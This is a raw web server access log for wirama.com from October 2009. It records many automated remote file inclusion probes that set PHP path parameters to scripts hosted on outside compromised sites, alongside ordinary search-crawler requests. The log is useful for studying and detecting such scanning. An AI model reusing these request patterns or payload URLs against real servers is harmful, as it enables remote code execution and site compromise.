219.166.240.66 - - [31/Oct/2009:08:57:08 -0700] "GET /send_reminders.php?noSet=0&includedir=http://204.3.167.134/xxx?????????????????????????????????????????????????????????????????????????????????????????????????&mode=id HTTP/1.1" 404 275 "-" "-" "wirama.com"
94.236.23.242 - - [31/Oct/2009:08:58:35 -0700] "GET /logs/access_090331.log//?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
94.236.23.242 - - [31/Oct/2009:08:58:35 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
94.236.23.242 - - [31/Oct/2009:08:58:35 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 3288 "-" "Mozilla/5.0" "wirama.com"
94.236.23.242 - - [31/Oct/2009:08:59:14 -0700] "GET /logs/access_090601.log//?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
91.121.26.186 - - [31/Oct/2009:09:00:12 -0700] "GET /skin/zero_vote/setup.php?dir=http://www.sjobergsbygg.nu/bilder/struktur/eq1.txt????&mode=id HTTP/1.1" 404 275 "-" "-" "wirama.com"
208.181.243.6 - - [31/Oct/2009:09:02:54 -0700] "GET /logs/access_090801.log//include/bbs.lib.inc.php?site_path=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
112.78.14.2 - - [31/Oct/2009:09:05:39 -0700] "GET /logs/access_090731.log///?_PHPLIB[libdir]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
112.78.14.2 - - [31/Oct/2009:09:05:40 -0700] "GET //?_PHPLIB[libdir]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
112.78.14.2 - - [31/Oct/2009:09:05:43 -0700] "GET /logs///?_PHPLIB[libdir]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 3289 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [31/Oct/2009:09:06:00 -0700] "GET /logs/access_090801.log/skin/zero_vote/setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [31/Oct/2009:09:06:00 -0700] "GET /logs/skin/zero_vote/setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [31/Oct/2009:09:06:00 -0700] "GET /skin/zero_vote/setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.47.7.71 - - [31/Oct/2009:09:15:55 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [31/Oct/2009:09:15:55 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [31/Oct/2009:09:15:55 -0700] "GET /logs/access_090401.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [31/Oct/2009:09:16:07 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [31/Oct/2009:09:16:07 -0700] "GET /logs/access_090401.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [31/Oct/2009:09:16:07 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.123.212.188 - - [31/Oct/2009:09:17:34 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.123.212.188 - - [31/Oct/2009:09:17:34 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.123.212.188 - - [31/Oct/2009:09:17:37 -0700] "GET /logs/access_090401.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.195.111.57 - - [31/Oct/2009:09:17:39 -0700] "GET /logs/access_090501.log HTTP/1.0" 200 5490289 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
202.123.212.188 - - [31/Oct/2009:09:17:45 -0700] "GET /logs/access_090401.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.123.212.188 - - [31/Oct/2009:09:17:45 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.123.212.188 - - [31/Oct/2009:09:17:45 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.123.212.188 - - [31/Oct/2009:09:18:01 -0700] "GET /logs/access_090401.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.123.212.188 - - [31/Oct/2009:09:18:01 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.123.212.188 - - [31/Oct/2009:09:18:02 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [31/Oct/2009:09:18:25 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.123.212.188 - - [31/Oct/2009:09:18:43 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.123.212.188 - - [31/Oct/2009:09:18:43 -0700] "GET /logs/access_090401.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.123.212.188 - - [31/Oct/2009:09:18:43 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [31/Oct/2009:09:19:03 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.47.7.71 - - [31/Oct/2009:09:19:03 -0700] "GET /logs/access_090401.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.47.7.71 - - [31/Oct/2009:09:19:28 -0700] "GET /logs/access_090331.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.59 - - [31/Oct/2009:09:20:40 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.59 - - [31/Oct/2009:09:20:40 -0700] "GET /_private/?N=D HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.106.211 - - [31/Oct/2009:09:24:03 -0700] "GET /_private/?D=A HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
82.193.15.3 - - [31/Oct/2009:09:25:01 -0700] "GET /logs/access_090801.log//skin/zero_vote/ask_password.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
82.193.15.3 - - [31/Oct/2009:09:25:16 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
82.193.15.3 - - [31/Oct/2009:09:25:24 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [31/Oct/2009:09:40:49 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.182 - - [31/Oct/2009:09:40:49 -0700] "GET /logs/access_090401.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.182 - - [31/Oct/2009:09:40:49 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.223.143.131 - - [31/Oct/2009:09:46:32 -0700] "GET //bbs/skin/zae_plan/view_foot.php//write.php?dir=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.223.143.131 - - [31/Oct/2009:09:46:32 -0700] "GET /logs///bbs/skin/zae_plan/view_foot.php//write.php?dir=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.223.143.131 - - [31/Oct/2009:09:46:32 -0700] "GET /logs/access_091001.log///bbs/skin/zae_plan/view_foot.php//write.php?dir=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.223.143.131 - - [31/Oct/2009:09:47:02 -0700] "GET /logs/access.log///bbs/skin/zae_plan/view_foot.php//write.php?dir=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.78.112.195 - - [31/Oct/2009:09:49:12 -0700] "GET /logs///bbs/skin/zae_plan/view_foot.php//write.php?dir=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.78.112.195 - - [31/Oct/2009:09:49:12 -0700] "GET //bbs/skin/zae_plan/view_foot.php//write.php?dir=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.78.112.195 - - [31/Oct/2009:09:49:12 -0700] "GET /logs/access_091001.log///bbs/skin/zae_plan/view_foot.php//write.php?dir=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.78.112.195 - - [31/Oct/2009:09:49:35 -0700] "GET /logs/access.log///bbs/skin/zae_plan/view_foot.php//write.php?dir=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.90.208.147 - - [31/Oct/2009:09:50:21 -0700] "GET /logs/access.log//write.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.195.111.57 - - [31/Oct/2009:09:59:57 -0700] "GET /logs/access_090201.log HTTP/1.0" 200 475690 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
210.97.237.144 - - [31/Oct/2009:10:00:08 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gabrielposada.com//enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
210.97.237.144 - - [31/Oct/2009:10:00:08 -0700] "GET /logs/access_090731.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gabrielposada.com//enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
210.97.237.144 - - [31/Oct/2009:10:00:08 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gabrielposada.com//enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [31/Oct/2009:10:00:26 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [31/Oct/2009:10:00:26 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [31/Oct/2009:10:00:26 -0700] "GET /logs/access_090401.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [31/Oct/2009:10:00:56 -0700] "GET /logs/access_090331.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.207.71 - - [31/Oct/2009:10:01:03 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
82.193.15.3 - - [31/Oct/2009:10:10:06 -0700] "GET /logs///bbs/skin/zae_plan/view_foot.php//write.php?dir=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.193.15.3 - - [31/Oct/2009:10:10:21 -0700] "GET /logs/access_091001.log///bbs/skin/zae_plan/view_foot.php//write.php?dir=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.193.15.3 - - [31/Oct/2009:10:10:22 -0700] "GET /logs/access.log///bbs/skin/zae_plan/view_foot.php//write.php?dir=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
58.230.118.81 - - [31/Oct/2009:10:20:09 -0700] "GET //components/com_moofaq/includes/file_includer.php?gzip=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:20:09 -0700] "GET /logs/access_090731.log///components/com_moofaq/includes/file_includer.php?gzip=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:20:09 -0700] "GET /logs///components/com_moofaq/includes/file_includer.php?gzip=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:20:13 -0700] "GET /logs///components/com_moofaq/includes/file_includer.php?gzip=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:20:13 -0700] "GET /logs/access_090731.log///components/com_moofaq/includes/file_includer.php?gzip=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:20:13 -0700] "GET //components/com_moofaq/includes/file_includer.php?gzip=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:20:23 -0700] "GET /logs///components/com_moofaq/includes/file_includer.php?gzip=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:20:23 -0700] "GET /logs/access_090731.log///components/com_moofaq/includes/file_includer.php?gzip=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:20:23 -0700] "GET //components/com_moofaq/includes/file_includer.php?gzip=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:20:23 -0700] "GET /logs/access_090731.log///components/com_moofaq/includes/file_includer.php?gzip=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:20:23 -0700] "GET /logs///components/com_moofaq/includes/file_includer.php?gzip=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:20:23 -0700] "GET //components/com_moofaq/includes/file_includer.php?gzip=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [31/Oct/2009:10:20:43 -0700] "GET /logs/access_090801.log/bbs/skin/zero_vote/dedekq.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [31/Oct/2009:10:20:43 -0700] "GET /bbs/skin/zero_vote/dedekq.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [31/Oct/2009:10:20:43 -0700] "GET /logs/bbs/skin/zero_vote/dedekq.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [31/Oct/2009:10:20:48 -0700] "GET /logs/access_090331.log/bbs/skin/zero_vote/dedekq.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:39:27 -0700] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:39:27 -0700] "GET /logs/access_090330.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:39:27 -0700] "GET /logs/access_090401.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:39:27 -0700] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:40:13 -0700] "GET /logs/access_090330.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:40:13 -0700] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:40:14 -0700] "GET /logs/access_090401.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:40:14 -0700] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:40:52 -0700] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:40:52 -0700] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:40:52 -0700] "GET /logs/access_090330.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:41:02 -0700] "GET /logs/access_090401.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:41:38 -0700] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:41:38 -0700] "GET /logs/access_090330.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:41:38 -0700] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.118.81 - - [31/Oct/2009:10:41:38 -0700] "GET /logs/access_090401.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.195.111.57 - - [31/Oct/2009:10:46:01 -0700] "GET /logs/access_090801.log HTTP/1.0" 200 159702 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
67.195.111.57 - - [31/Oct/2009:11:03:46 -0700] "GET /pr01.htm HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
81.12.13.152 - - [31/Oct/2009:11:20:46 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [31/Oct/2009:11:20:46 -0700] "GET /logs/access_090401.log///admin/spaw/spaw_control.class.php?spaw_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [31/Oct/2009:11:20:46 -0700] "GET /logs///admin/spaw/spaw_control.class.php?spaw_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [31/Oct/2009:11:21:08 -0700] "GET /logs/access_090801.log///admin/spaw/spaw_control.class.php?spaw_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.195.111.57 - - [31/Oct/2009:11:24:13 -0700] "GET /logs/scripts.log HTTP/1.0" 200 5761 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
219.166.240.66 - - [31/Oct/2009:11:25:42 -0700] "GET /modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://204.3.167.134/xxx?????????????????????????????????????????????????????????????????????????????????????????????????&mode=id HTTP/1.1" 404 275 "-" "-" "wirama.com"
67.195.111.57 - - [31/Oct/2009:11:30:32 -0700] "GET /logs/access_090501.log HTTP/1.0" 200 5490289 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
202.123.212.188 - - [31/Oct/2009:11:36:02 -0700] "GET /inc/formmail.inc.php?script_root=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.123.212.188 - - [31/Oct/2009:11:36:02 -0700] "GET /logs/access_090901.log//inc/formmail.inc.php?script_root=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.123.212.188 - - [31/Oct/2009:11:36:02 -0700] "GET /logs//inc/formmail.inc.php?script_root=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
201.38.203.3 - - [31/Oct/2009:11:38:29 -0700] "GET /logs/main.php?_zb_path=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
201.38.203.3 - - [31/Oct/2009:11:38:29 -0700] "GET /main.php?_zb_path=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
201.38.203.3 - - [31/Oct/2009:11:38:29 -0700] "GET /logs/access_090329.log/main.php?_zb_path=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.155.5.84 - - [31/Oct/2009:11:40:46 -0700] "GET /logs/access_090330.log/main.php?_zb_path=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.155.5.84 - - [31/Oct/2009:11:40:46 -0700] "GET /main.php?_zb_path=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.155.5.84 - - [31/Oct/2009:11:40:46 -0700] "GET /logs/main.php?_zb_path=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.155.5.84 - - [31/Oct/2009:11:41:04 -0700] "GET /logs/access_090329.log/main.php?_zb_path=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.155.5.84 - - [31/Oct/2009:11:46:05 -0700] "GET /logs/access_090501.log/main.php?_zb_path=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
208.80.193.34 - - [31/Oct/2009:11:47:15 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts-MyWay; FunWebProducts; .NET CLR 1.0.3705)" "www.wirama.com"
65.55.208.46 - - [31/Oct/2009:11:47:29 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.46 - - [31/Oct/2009:11:47:29 -0700] "GET /logs/access_090601.log HTTP/1.1" 200 0 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
